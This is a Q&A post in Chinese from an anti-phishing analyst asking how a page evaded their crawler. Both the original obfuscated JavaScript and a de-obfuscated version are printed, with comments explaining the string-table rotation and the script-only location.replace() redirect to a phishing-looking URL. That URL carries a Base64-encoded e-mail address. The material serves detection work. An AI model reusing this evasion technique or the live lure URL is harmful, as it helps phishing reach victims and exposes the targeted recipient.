问题描述
我在一家反网络钓鱼公司工作,偶然发现了一个成功逃避我们 JCrawler 检测的案例。我试图读懂这段代码,弄清攻击者做了什么才得以不被发现,但始终没能弄明白,实在很困惑。
我们该如何避免漏检此类网站?页面源码如下:
<!DOCTYPE html>
<html>
<title>Loading...</title>
<link rel="shortcut icon" href="favicon_a_eupayfgghqiai7k9sol6lg2.ico" />
<body>
<script>
// Sample under analysis: a client-side redirector. The document has no visible
// content apart from the "Loading..." title; the whole script exists to call
// location.replace() with the single URL stored in the string table below.
// NOTE(review): the hop is made only by script (no meta refresh is present in
// this markup), so a crawler that fetches the HTML without executing JavaScript
// and following script-driven navigation presumably stops here. For triage,
// render such pages in an instrumented browser that records location changes,
// and extract URL literals from inline scripts statically as a fallback.
//
// String table, stored out of order on purpose. It holds the destination URL,
// the method name 'replace', and eleven digit-prefixed strings that are used
// only as inputs to the checksum further down. The `data=` query value is
// Base64 and decodes to what looks like an e-mail address, so the lure is
// likely personalised per recipient - handle it as personal data in reports.
var _0x117d=['4gSLXgI','2815VEHvFQ','14927VMrRFI','180751tIiKtp','11OWCNOZ','264810PhaCGI','49788ekTpju','https://42m6lvv4qywlq97qagwvfhnvm.monakasatelyoum.com/69bd90c1d7eb4aea978f3b70b4c2ba01//-5D8nkf4Z8xowFj3dQSEOEAXkZbuLZbhvqckbUQIUGexERLdh7sgiiPu2dFknWuLaNuPLXHFNrKVsxBbwZml4cYEzxyj9bgHiJ5Qw485IUD2zCeI7l64XLrI9g7ChMk1U5MYIuWxbXIcqzk9RWPV5iVrChffikJy47gqSntD7qDhUBRRu33pHKYqGcVGD3Yv7YVvoEiGy?data=c2hhbHNhbGxAYmFjYXJkaS5jb20=','53294CAvUWH','289945bcwcUH','68GhmpuA','replace','15KaunFV'];
// Lookup helper: returns _0x117d[n - 0x108]. The second parameter is never used.
var _0x3d5f=function(_0x1853ca,_0x41286d){_0x1853ca=_0x1853ca-0x108;
var _0x117ddf=_0x117d[_0x1853ca];
return _0x117ddf;};
var _0x37e4a6=_0x3d5f;
// Self-decoding step: rotate the table (shift + push) until a checksum built
// from parseInt() of selected entries equals 0x339a1. parseInt() reads only the
// leading digits of each entry; while the URL or 'replace' occupies one of the
// checksum slots the sum is NaN, the comparison fails and the table is rotated
// again. With this table the match occurs after four rotations, which leaves
// 'replace' at offset 0x10f and the URL at offset 0x10b.
// The expression after the comma then runs location['replace'](URL), i.e. the
// browser navigates to the URL without leaving this page in session history.
(function(_0x5bb9bd,_0x286286){var _0xe278b9=_0x3d5f;
while(!![])
{try{var _0x2d8884=parseInt(_0xe278b9(0x10c))*-parseInt(_0xe278b9(0x111))+parseInt(_0xe278b9(0x10d))+-parseInt(_0xe278b9(0x112))*parseInt(_0xe278b9(0x10e))+-parseInt(_0xe278b9(0x109))+parseInt(_0xe278b9(0x113))*parseInt(_0xe278b9(0x110))+-parseInt(_0xe278b9(0x114))+parseInt(_0xe278b9(0x108))*parseInt(_0xe278b9(0x10a));
if(_0x2d8884===_0x286286)
break;
else _0x5bb9bd['push'](_0x5bb9bd['shift']());}
catch(_0x54c267){_0x5bb9bd['push'](_0x5bb9bd['shift']());}}}(_0x117d,0x339a1),location[_0x37e4a6(0x10f)](_0x37e4a6(0x10b)));
</script>
</body>
</html>
解决方法
这看起来像是 JS 混淆器的输出,对吧?去混淆后的代码如下:脚本只是不断轮转字符串数组,直到校验值匹配,然后调用 location.replace() 跳转到数组中的那个 URL。
// De-obfuscated rendering of the inline script from the sample page. Behaviour
// is the same: rotate a string table until a checksum matches, then call
// location.replace() with the URL held in that table.
// NOTE(review): the readable identifiers below (_getCompositionValue, toMonths,
// userPsd, oldPassword) appear to be guesses made by the de-obfuscation tool.
// Nothing in this code handles dates or passwords; do not read meaning into them.
// NOTE(review): a few letters in this listing differ in case from the original
// sample shown earlier on the page (for example "68GhmPuA" here versus
// "68GhmpuA", and parts of the URL path). The leading digits are unchanged, so
// the checksum still matches, but take indicators from the original sample,
// not from this listing.
'use strict';
// String table: eleven digit-prefixed checksum inputs, the destination URL and
// the method name "replace", stored out of order. The `data=` value is Base64
// and decodes to what looks like an e-mail address (likely a per-recipient lure).
var _0x117d = ["4gSLXgI","2815VEHvFQ","14927VMrRFI","180751tIiKtp","11OWCNOZ","264810PhaCGI","49788ekTpju","https://42m6lvv4qywlq97qagwvfhnvm.monakasatelyoum.com/69bd90c1d7eb4aea978f3b70b4c2ba01//-5D8nkf4Z8xowFj3dQseoEAXkZbuLZbhvqckbUQIUGexERLdh7SGIiPu2dFknWuLaNuPLXHFNrKVsxBbwZml4cYEzxyj9bgHiJ5Qw485IUD2zCeI7l64XLrI9g7ChMk1U5MYIuWxbXIcqzk9RWPV5iVrChffikJy47gqSntD7qDhUBRRu33pHKYqGcVGD3Yv7YVvoEiGy?data=c2hhbHNhbGxAYmFjYXJkaS5jb20=","53294CAvUWH","289945bcwcUH","68GhmPuA","replace","15KaunFV"];
// Lookup helper: returns _0x117d[key - 264] (264 is 0x108 in the original).
// The incoming `value` argument is ignored; the inner `var value` redeclares it.
var _0x3d5f = function _getCompositionValue(key,value) {
key = key - 264;
var value = _0x117d[key];
return value;
};
var _0x37e4a6 = _0x3d5f;
// Rotation loop. `data` is the string table and `oldPassword` is the target
// checksum (211361, written 0x339a1 in the original).
(function(data,oldPassword) {
var toMonths = _0x3d5f;
for (; !![];) {
try {
// parseInt() keeps only the leading digits of each entry. While the URL or
// "replace" sits in one of these slots the result is NaN, the comparison
// below fails, and the table is rotated once more.
var userPsd = parseInt(toMonths(268)) * -parseInt(toMonths(273)) + parseInt(toMonths(269)) + -parseInt(toMonths(274)) * parseInt(toMonths(270)) + -parseInt(toMonths(265)) + parseInt(toMonths(275)) * parseInt(toMonths(272)) + -parseInt(toMonths(276)) + parseInt(toMonths(264)) * parseInt(toMonths(266));
if (userPsd === oldPassword) {
break;
} else {
// Move the first entry to the end and try again.
data["push"](data["shift"]());
}
} catch (_0x54c267) {
data["push"](data["shift"]());
}
}
// After the loop (four rotations with this table) offset 271 resolves to
// "replace" and offset 267 to the URL, so the trailing expression is
// location.replace(URL): a script-driven navigation that does not leave this
// page in session history. Tooling that only parses the HTML for redirects will
// not follow it; it has to be observed in an instrumented browser or recovered
// by extracting URL literals from the script.
})(_0x117d,211361),location[_0x37e4a6(271)](_0x37e4a6(267));